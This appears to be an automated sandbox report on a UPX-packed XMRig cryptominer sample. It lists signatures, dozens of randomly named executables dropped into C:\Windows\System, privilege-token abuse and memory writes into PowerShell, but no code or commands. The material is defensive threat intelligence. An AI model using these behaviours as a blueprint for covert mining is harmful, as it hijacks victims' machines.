Malware Analysis Report

2025-01-06 15:42

Sample ID 240525-tlb3ssae37
Target 7283d55cf2c83e95324ff585e4cba837_JaffaCakes118
SHA256 cedebea0eaa0721bdfddb834db392719b52a69d1434a66da45f8897914396314
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cedebea0eaa0721bdfddb834db392719b52a69d1434a66da45f8897914396314

Threat Level: Known bad

The file 7283d55cf2c83e95324ff585e4cba837_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 16:08

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 16:08

Reported

2024-05-25 16:10

Platform

win7-20240215-en

Max time kernel

150s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\nxsgwQw.exe N/A
N/A N/A C:\Windows\System\jBcQhYe.exe N/A
N/A N/A C:\Windows\System\DEwbDna.exe N/A
N/A N/A C:\Windows\System\tttNocG.exe N/A
N/A N/A C:\Windows\System\sIwWnBa.exe N/A
N/A N/A C:\Windows\System\ebHpxrH.exe N/A
N/A N/A C:\Windows\System\xFkYNii.exe N/A
N/A N/A C:\Windows\System\NqTNEDg.exe N/A
N/A N/A C:\Windows\System\zdadgdg.exe N/A
N/A N/A C:\Windows\System\TXMDJsx.exe N/A
N/A N/A C:\Windows\System\PIDbzEL.exe N/A
N/A N/A C:\Windows\System\QpTyTVj.exe N/A
N/A N/A C:\Windows\System\tEImjCa.exe N/A
N/A N/A C:\Windows\System\kpIZRHh.exe N/A
N/A N/A C:\Windows\System\JAmRzzh.exe N/A
N/A N/A C:\Windows\System\mlTjGPZ.exe N/A
N/A N/A C:\Windows\System\qptySaA.exe N/A
N/A N/A C:\Windows\System\CmTYzrq.exe N/A
N/A N/A C:\Windows\System\AkzluIL.exe N/A
N/A N/A C:\Windows\System\nnDxpye.exe N/A
N/A N/A C:\Windows\System\tlLCerR.exe N/A
N/A N/A C:\Windows\System\KXVVphN.exe N/A
N/A N/A C:\Windows\System\LnujtEy.exe N/A
N/A N/A C:\Windows\System\LPRaNIX.exe N/A
N/A N/A C:\Windows\System\viZeKFh.exe N/A
N/A N/A C:\Windows\System\cGNIoNf.exe N/A
N/A N/A C:\Windows\System\OiZMVrb.exe N/A
N/A N/A C:\Windows\System\ZBfARBT.exe N/A
N/A N/A C:\Windows\System\HTMLqID.exe N/A
N/A N/A C:\Windows\System\QqctqeI.exe N/A
N/A N/A C:\Windows\System\XbvDRjO.exe N/A
N/A N/A C:\Windows\System\iWKzWuz.exe N/A
N/A N/A C:\Windows\System\pyXqLnw.exe N/A
N/A N/A C:\Windows\System\GOhOzij.exe N/A
N/A N/A C:\Windows\System\brlnahK.exe N/A
N/A N/A C:\Windows\System\rityzKa.exe N/A
N/A N/A C:\Windows\System\VCuPpez.exe N/A
N/A N/A C:\Windows\System\tnjYSaC.exe N/A
N/A N/A C:\Windows\System\KwBrXPP.exe N/A
N/A N/A C:\Windows\System\NeqOnVH.exe N/A
N/A N/A C:\Windows\System\uOZeKVF.exe N/A
N/A N/A C:\Windows\System\KCqlKQe.exe N/A
N/A N/A C:\Windows\System\btPVlPS.exe N/A
N/A N/A C:\Windows\System\MXDtfnB.exe N/A
N/A N/A C:\Windows\System\MPzOIQH.exe N/A
N/A N/A C:\Windows\System\lTdoEQY.exe N/A
N/A N/A C:\Windows\System\vDkrPrV.exe N/A
N/A N/A C:\Windows\System\lbYyMSG.exe N/A
N/A N/A C:\Windows\System\XODUMtS.exe N/A
N/A N/A C:\Windows\System\ZZYpJDG.exe N/A
N/A N/A C:\Windows\System\krZQQiq.exe N/A
N/A N/A C:\Windows\System\bYbnSdh.exe N/A
N/A N/A C:\Windows\System\zhMsDmc.exe N/A
N/A N/A C:\Windows\System\ZHEwIKi.exe N/A
N/A N/A C:\Windows\System\rKQTeYH.exe N/A
N/A N/A C:\Windows\System\yFhiVRN.exe N/A
N/A N/A C:\Windows\System\iwQdpqw.exe N/A
N/A N/A C:\Windows\System\YkLWwcL.exe N/A
N/A N/A C:\Windows\System\bHOngCm.exe N/A
N/A N/A C:\Windows\System\ZpCJiQq.exe N/A
N/A N/A C:\Windows\System\OHLIhKZ.exe N/A
N/A N/A C:\Windows\System\aKftMEX.exe N/A
N/A N/A C:\Windows\System\UmEIzYQ.exe N/A
N/A N/A C:\Windows\System\LBukKgf.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\PcTcAGj.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\hALKSAa.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\bzgCprf.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\aYcrvYT.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\gQUBjbi.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\fDCHDnM.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\THGZVzW.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\QXLLIgB.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\rEGnMwt.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\KWXfEmQ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\BKwLXPL.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\oNHPXlE.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\DuvSJCo.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\MMYizzK.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\FbXuKFD.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\bHQVmaw.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\JgiOdwV.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\yCFXFzr.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\fWWzJdF.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\GsHnUWb.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\WQzNVel.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\YUXQnqf.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\OHOPYTR.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\jdxbnFf.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\NwzQWri.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ceELxcb.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\TmoRDzn.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dnDCTWz.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\VUCiwPs.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\BLfiLWx.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\tuCndxy.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\HzCgXLT.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\WKVkwLN.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\MvRRQZd.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\sbyHwjj.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\LnujtEy.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\FRpObkh.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\QBYgrWO.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dWePDnv.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\NSCSYmp.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\buPKxMZ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dEHrGXN.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dpJbzhE.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\cudYgyk.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\DxbYNIm.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\fqYlNeu.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\RVemvBW.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ruthjGl.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\XiQanRD.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\zSoHzbc.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\zVsFTyJ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\nuHFwbz.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\BrucSHk.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\rmtGPNo.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\HhkrYLo.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\AdytwzO.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\ReeTwvf.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\gXgTuFh.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\dlChsaZ.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\RbHRzcN.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\GvsUMNP.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\XKbQqdE.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\quFwHGC.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
File created C:\Windows\System\GItAFcN.exe C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nxsgwQw.exe
PID 2348 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nxsgwQw.exe
PID 2348 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nxsgwQw.exe
PID 2348 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\jBcQhYe.exe
PID 2348 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\jBcQhYe.exe
PID 2348 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\jBcQhYe.exe
PID 2348 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\DEwbDna.exe
PID 2348 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\DEwbDna.exe
PID 2348 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\DEwbDna.exe
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tttNocG.exe
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tttNocG.exe
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tttNocG.exe
PID 2348 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\sIwWnBa.exe
PID 2348 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\sIwWnBa.exe
